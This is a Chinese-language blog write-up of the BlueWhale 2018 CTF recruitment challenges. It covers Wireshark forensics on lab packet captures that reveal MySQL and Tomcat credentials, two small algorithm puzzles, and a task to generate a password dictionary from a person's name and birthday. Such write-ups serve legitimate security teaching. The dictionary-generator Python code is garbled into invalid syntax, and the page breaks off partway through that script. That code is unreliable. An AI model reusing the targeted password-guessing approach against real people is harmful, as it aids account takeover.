<!DOCTYPE html>
<html lang="en">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"srpopty.github.io","root":"/","scheme":"Muse","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="BlueWhale 2018年纳新题目解析。">
<meta property="og:type" content="article">
<meta property="og:title" content="BlueWhale2018年纳新题目Writeup">
<meta property="og:url" content="https://srpopty.github.io/2018/10/10/BlueWhale2018%E5%B9%B4%E7%BA%B3%E6%96%B0%E9%A2%98%E7%9B%AEWriteup/index.html">
<meta property="og:site_name" content="Shadow Gallery">
<meta property="og:description" content="BlueWhale 2018年纳新题目解析。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911104547.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911104914.png">
<meta property="og:image" content="https://srpopty.github.io/.io//LUXR1U9KDHAFRB67XUIP.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911105723.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911105806.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911112450.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911112741.png">
<meta property="og:image" content="https://srpopty.github.io/.io//3_CZVSIG0HQBL58XIHEO.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911113108.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911113827.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911114150.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911114512.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911114839.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911204309.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911205408.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911205049.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911205615.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911205945.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180924155642.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911211512.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911213232.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911213408.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911213924.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911214704.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180924162538.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180924162749.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180924163232.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180917224924.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180917225713.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180919213440.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180919213746.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180919214153.png">
<meta property="og:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180919213522.png">
<meta property="article:published_time" content="2018-10-10T12:01:47.000Z">
<meta property="article:modified_time" content="2020-08-11T08:56:47.999Z">
<meta property="article:author" content="Srpopty">
<meta property="article:tag" content="BlueWhale">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://srpopty.github.io/.io//TIM%E6%88%AA%E5%9B%BE20180911104547.png">

<link rel="canonical" href="https://srpopty.github.io/2018/10/10/BlueWhale2018%E5%B9%B4%E7%BA%B3%E6%96%B0%E9%A2%98%E7%9B%AEWriteup/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>BlueWhale2018年纳新题目Writeup | Shadow Gallery</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Shadow Gallery" type="application/atom+xml"><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Shadow Gallery</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Live in the shadow</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://srpopty.github.io/2018/10/10/BlueWhale2018%E5%B9%B4%E7%BA%B3%E6%96%B0%E9%A2%98%E7%9B%AEWriteup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Srpopty">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Shadow Gallery">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BlueWhale2018年纳新题目Writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2018-10-10 20:01:47" itemprop="dateCreated datePublished" datetime="2018-10-10T20:01:47+08:00">2018-10-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-08-11 16:56:47" itemprop="dateModified" datetime="2020-08-11T16:56:47+08:00">2020-08-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <div class="post-description">BlueWhale 2018年纳新题目解析。</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Forensics"><a href="#Forensics" class="headerlink" title="Forensics"></a>Forensics</h1><h2 id="BabyForensics-200"><a href="#BabyForensics-200" class="headerlink" title="BabyForensics (200)"></a>BabyForensics (200)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">一名黑客渗透了一个网站，并且最后拿到了一份机密信息，我们抓到了黑客入侵过程的全部流量，正在进行取证工作</span><br><span class="line"></span><br><span class="line">请问这个网站使用的PHP框架是什么？</span><br><span class="line">请问黑客最后拿到的机密文件中MYSQL服务器的用户名与密码是什么？</span><br><span class="line">请问黑客最后拿到的机密文件中MYSQL服务器的IPV4地址是什么？</span><br><span class="line">此题仅限大一学生，大二及以上学生不计分</span><br><span class="line"></span><br><span class="line">注： flag中的字母全部小写</span><br><span class="line"></span><br><span class="line">flag格式为&quot;flag&#123;框架名称_MYSQL用户名_MYSQL密码_MYSQL的IP地址&#125;&quot;</span><br><span class="line"></span><br><span class="line">流量包：https:&#x2F;&#x2F;**********&#x2F;resource&#x2F;BabyForensics.zip</span><br><span class="line">备用下载：http:&#x2F;&#x2F;**********&#x2F;temp&#x2F;BabyForensics.zip</span><br><span class="line">Update: 流量包已上传至群文件中</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>压缩文件下载下来后解压出来是一个pcap文件，不知道怎么打开可以Google一下<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911104547.png"></p>
<p>找到<a target="_blank" rel="noopener" href="https://www.wireshark.org/">Wireshark</a>下载安装，开始取证</p>
<p>pcap文件是一个很大的数据包，里面包含了许多个小的数据包，数据包根据协议也有很多的种类<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911104914.png"><br>上图中的协议有ARP、TCP与HTTP，此题只需关注http的数据包</p>
<p>使用显示过滤器过滤出http的数据包<br><img src="/.io//LUXR1U9KDHAFRB67XUIP.png"><br>上图中圈起来的就是“一对”数据包，上面的是请求包，下面的是响应包。每次浏览网页时，浏览器会向服务器发送一个请求，服务器收到请求后会返回一个响应。题目描述中讲到黑客最后获取了一份机密文件，所以这里进一步关注服务器的响应包，并且这个响应包应该是在最后。</p>
<p>从最后一个响应包，一个一个往前翻，在第734581个数据包中发现了一份配置文件，这里面有这道题的所有答案<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911105723.png"><br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911105806.png"></p>
<p>PHP框架：douphp<br>MYSQL地址：10.3.3.101<br>MYSQL用户名：web<br>MYSQL密码：e667jUPvJjXHvEUv</p>
<blockquote>
<p>flag{douphp_web_e667jUPvJjXHvEUv_10.3.3.101}</p>
</blockquote>
<p>另外由于这三个题是相互关联的，所以黑客的IP地址为192.168.94.59</p>
<hr>
<h2 id="Mail1-500"><a href="#Mail1-500" class="headerlink" title="Mail1 (500)"></a>Mail1 (500)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">一名黑客渗透了一个网站，我们抓到了黑客入侵过程的全部流量，正在进行取证工作</span><br><span class="line"></span><br><span class="line">请问黑客的IP地址是多少？</span><br><span class="line">请问该系统中所使用的交换机的型号是多少？</span><br><span class="line">已知网站中使用了某种简单的Tomcat容器自身的访问控制机制，请问该网站中Tomcat认证的用户名和密码是多少？</span><br><span class="line">注： flag中的字母全部小写</span><br><span class="line">flag格式为&quot;flag&#123;IP地址_型号_用户名_密码&#125;&quot;</span><br><span class="line">流量包：https:&#x2F;&#x2F;**********&#x2F;resource&#x2F;Mail1.zip</span><br><span class="line">Update: 流量包已上传至群文件中</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>黑客的IP地址上一问已经出来了，接着寻找交换机的型号。一个包一个包的翻肯定是不现实的，最好的办法就是用关键字搜索<br>交换机的英文是switch，在字节流中搜索一下就能找到<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911112450.png"></p>
<p>关于Tomcat容器自身的访问控制机制，题目中给了一个<a target="_blank" rel="noopener" href="https://blog.csdn.net/zzy7075/article/details/53639832">参考链接</a>，<strong>认真</strong>看完那篇文章，就能发现文章中介绍的那么多访问控制机制中，只有一个是经常在web表单认证中使用的<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911112741.png"><br><img src="/.io//3_CZVSIG0HQBL58XIHEO.png"></p>
<p>于是继续搜索关键词j_username与j_password，也是一下就能找到<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911113108.png"></p>
<p>黑客的IP地址：192.168.94.59<br>交换机的型号：s5120-28p-li<br>认证用户名：system<br>认证密码：manager</p>
<blockquote>
<p>flag{192.168.94.59_s5120-28p-li_system_manager}</p>
</blockquote>
<hr>
<h2 id="Mail2-500"><a href="#Mail2-500" class="headerlink" title="Mail2 (500)"></a>Mail2 (500)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">一名黑客渗透了一个网站，我们抓到了黑客入侵过程的全部流量，正在进行取证工作</span><br><span class="line"></span><br><span class="line">请问管理员的邮箱是什么？</span><br><span class="line">请问黑客登录的邮箱中一共有几封邮件？</span><br><span class="line">请问黑客登录的邮箱中发送的最早的一封邮件的时间是多少？（转换成时间戳）</span><br><span class="line">Hint1: 这三道流量分析题目是相互关联的</span><br><span class="line">Hint2: 在该流量包中有两个不同的人登录过邮箱，其中一个才是黑客，另一个不用管他</span><br><span class="line"></span><br><span class="line">注： flag中的字母全部小写</span><br><span class="line">flag格式为&quot;flag&#123;管理员邮箱_邮件数量_时间戳&#125;&quot;</span><br><span class="line">流量包：https:&#x2F;&#x2F;*********&#x2F;resource&#x2F;Mail2.zip</span><br><span class="line">Update: 流量包已上传至群文件中</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个题就需要仔细分析整个流量包了，首先只需关注http的包，并且一直这三道题是相互关联的，那么在这个流量包中只需定位黑客IP地址的包即可，使用显示过滤器进行过滤，由此定位到黑客登录邮箱那附近的数据包，进行标记<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911113827.png"><br>一般在登录邮箱后进入的页面会显示邮箱中所有的邮件，所以在登录数据包的后面不远处肯定能找到邮箱中的全部邮件，追踪这个包的Http字节流，在登陆之后的几个包中就能找到请求邮件的包<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911114150.png"></p>
<p>在这个包后面的那个包中就是所有邮件的列表，将其字节流导出为html文件，之后在浏览器打开<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911114512.png"></p>
<p>所以最早的日期为<br>2018-08-08 14:36<br>将其转换为时间戳为<br>1533710160</p>
<p>另外寻找管理员的邮箱只需在字节流中查找关键字“admin@”即可，非常好找<br><img src="/.io//TIM%E6%88%AA%E5%9B%BE20180911114839.png"></p>
<p>管理员邮箱：<a href="mailto:&#97;&#x64;&#109;&#105;&#110;&#64;&#x74;&#x65;&#x73;&#116;&#x2e;&#x63;&#x6f;&#x6d;">&#97;&#x64;&#109;&#105;&#110;&#64;&#x74;&#x65;&#x73;&#116;&#x2e;&#x63;&#x6f;&#x6d;</a><br>邮件数量：15<br>时间戳：1533710160</p>
<blockquote>
<p>flag{admin@test.com_15_1533710160}</p>
</blockquote>
<hr>
<h1 id="PPC"><a href="#PPC" class="headerlink" title="PPC"></a>PPC</h1><h2 id="查找素数-150"><a href="#查找素数-150" class="headerlink" title="查找素数 (150)"></a>查找素数 (150)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">已知有一个等差数列，其首元素为455，公差为194, 要求找出在该数列中的第149个素数</span><br><span class="line"></span><br><span class="line">此题仅限于大一学生，大二及以上学生该题不计分</span><br><span class="line"></span><br><span class="line">flag格式为flag&#123;程序结果&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>在一个很大的等差数列中找素数，很简单，脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span>(<span class="params">n</span>):</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">2</span>, int(n/<span class="number">2</span>+<span class="number">1</span>)):</span><br><span class="line">        <span class="keyword">if</span> n % i == <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sequence = <span class="number">455</span></span><br><span class="line">count = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">if</span> check(sequence):</span><br><span class="line">        count += <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">149</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    sequence += <span class="number">194</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> sequence</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>结果为165161</p>
<blockquote>
<p>flag{165161}</p>
</blockquote>
<hr>
<h2 id="下落的小球-180"><a href="#下落的小球-180" class="headerlink" title="下落的小球 (180)"></a>下落的小球 (180)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">已知有一颗最大深度为16的完全二叉树，所有叶子结点深度相同。若在根节点处放一个小球，小球会沿着根节点结点开始下落。该完全二叉树内每个结点上都有一个开关，默认全部关闭，当小球下落后，每当有小球落到一个开关上时，开关的状态会改变。当小球到达一个结点时，如果该结点上的开关关闭，则往小球向左走，否则向右走，直到到达叶子结点为止。求第12345个小球落下后的叶子结点编号。</span><br><span class="line"></span><br><span class="line">flag格式为flag&#123;结点编号&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p> 此题的意思是在一个深度为16的已经编号了序号的二叉树上，从根节点出下落一个小球，如果该节点为关则下一步小球向左走，否则向右走，默认全部为开，小球经过后开关取反。<br> 可以用列表构造一颗二叉树，里面包含了所有节点，之后模拟每一个小球的下落过程，直到第12345个小球为止<br>根据二叉树的性质，深度为n的二叉树最多有2^n-1个节点，所以列表大小行为2^16-1<br> 小球一开始从根节点（1号节点）开始落下每次下落一层，如果往左下落，则下一个节点的编号为当前节点编号的2倍，往右落下则为往左落下的节点编号+1<br>脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">tree = [<span class="literal">False</span>] * (<span class="number">2</span> ** <span class="number">16</span> - <span class="number">1</span>)</span><br><span class="line"><span class="keyword">for</span> ball <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">12345</span> + <span class="number">1</span>):</span><br><span class="line">    node = <span class="number">1</span></span><br><span class="line">    <span class="keyword">for</span> layer <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">15</span>):</span><br><span class="line">        _node = node</span><br><span class="line">        node = node * <span class="number">2</span> + <span class="number">1</span> <span class="keyword">if</span> tree[node] <span class="keyword">else</span> node * <span class="number">2</span></span><br><span class="line">        tree[_node] = <span class="keyword">not</span> tree[_node]</span><br><span class="line">        <span class="keyword">if</span> ball == <span class="number">12345</span> <span class="keyword">and</span> layer == <span class="number">14</span>:</span><br><span class="line">            <span class="keyword">print</span> node</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最后结果为36358</p>
<blockquote>
<p>flag{36358}</p>
</blockquote>
<hr>
<h2 id="密码生成-200"><a href="#密码生成-200" class="headerlink" title="密码生成 (200)"></a>密码生成 (200)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">已知某人的姓名如生日，要求制作出一份字典，准确率越高越好</span><br><span class="line">关于字典</span><br><span class="line"></span><br><span class="line">测试时我们会准备一些不会超出题目范围的密码，其中包含了姓名与生日的信息</span><br><span class="line"></span><br><span class="line">注意并不一定是全部信息，可能包含了部分信息，例如姓名为zhang san，其生日是1998 5 3，我们的测试密码为zhang199853或zs980503</span><br><span class="line"></span><br><span class="line">我们将会测试我们准备的密码是否程序生成的字典之中，并且对程序生成密码的准确性与广泛性以及生成算法做一个估计与评价</span><br><span class="line"></span><br><span class="line">语言限制为C或C++，源代码中最好包含注释，注意变量、函数等命名规范</span><br><span class="line"></span><br><span class="line">此题仅限于大一学生，大二及以上学生该题不计分</span><br><span class="line"></span><br><span class="line">程序完成后请将源码打包发送至邮箱********@outlook.com，通过后我们会将flag发送给你</span><br><span class="line"></span><br><span class="line">严禁抄袭</span><br><span class="line"></span><br><span class="line">输入格式</span><br><span class="line">一共包含两行</span><br><span class="line">第一行为姓名的拼音，之间用空格分割</span><br><span class="line">    可以保证全部为小写并且姓名长度小于等于4个字（如&quot;诸葛孔明&quot; -&gt; &quot;zhu ge kong ming&quot; 或 &quot;洁&quot; -&gt; &quot;jie&quot; ）</span><br><span class="line">第二行为生日，之间用空格分割</span><br><span class="line">    可以保证没有前导0，并且生日是完全合理的（即不会出现9999 9999 9999这样的输入，但可能会出现483 2 9这类，483年2月9日）</span><br><span class="line">如</span><br><span class="line">    zhang san</span><br><span class="line">    1998 5 3</span><br><span class="line">输出格式</span><br><span class="line">要求输出到名为&#39;dic.txt&#39;的文件中，每行一个密码</span><br><span class="line">如</span><br><span class="line">    zhang199853</span><br><span class="line">    zhang1998053</span><br><span class="line">    zhang19980503</span><br><span class="line">    Zhang199853</span><br><span class="line">    ....</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p> 只需要尽可能多的考虑常见的姓名与生日的组合即可，先手动分析一下，以”张三 1998 5 27”为例<br> zhang san<br> 1998 5 27  </p>
<ol>
<li>姓名与生日的组合方式只有两种<br>姓名 + 生日<br>生日 + 姓名  </li>
<li>姓名的组合方式有全称和缩写两种<br>其中姓名的每一个字都有可能为缩写，例如<br>zhangsan(没有缩写) -&gt; zhangs(“三”被缩写) -&gt; zsan(“张”被缩写) -&gt; zs(两个字都缩写)<br>三个字和四个字的名字同理  </li>
<li>姓名的大小写组合方式<br>考虑每个姓名方式的大小写情况<br>Zhangsan ZHangsan …  </li>
<li>姓氏单独出现<br>也有可能只有姓氏出现，比如 zhang19980521  </li>
<li>生日中年份的组合有两种<br>如 1998 或 98  </li>
<li>月与日的组合也各有两种<br>分为有前导0和每有前导0两种<br>如 521 或 0521(5有前导0)<br>假如生日为1号，则 0501(都有前导0) 或 051(5有前导0) 或 501(1有前导0) 或 51(都没有前导0)</li>
</ol>
<p>可能的结果分析清楚后，一层一层的叠加处理即可，脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Permutations</span>(<span class="params">object</span>):</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self</span>):</span></span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="meta">    @staticmethod</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">LetterCase</span>(<span class="params">strings</span>):</span></span><br><span class="line">        res = []</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span> &gt; j) &amp; <span class="number">1</span> <span class="keyword">else</span> s.upper()</span><br><span class="line">                j += <span class="number">1</span></span><br><span class="line">            res.append(word)</span><br><span class="line">        <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"><span class="meta">    @staticmethod</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">WordCombination</span>(<span class="params">word</span>):</span></span><br><span class="line">        res = []</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span> &gt; j) &amp; <span class="number">1</span> <span class="keyword">else</span> s</span><br><span class="line">                j += <span class="number">1</span></span><br><span class="line">            res.append(word)</span><br><span class="line">        <span 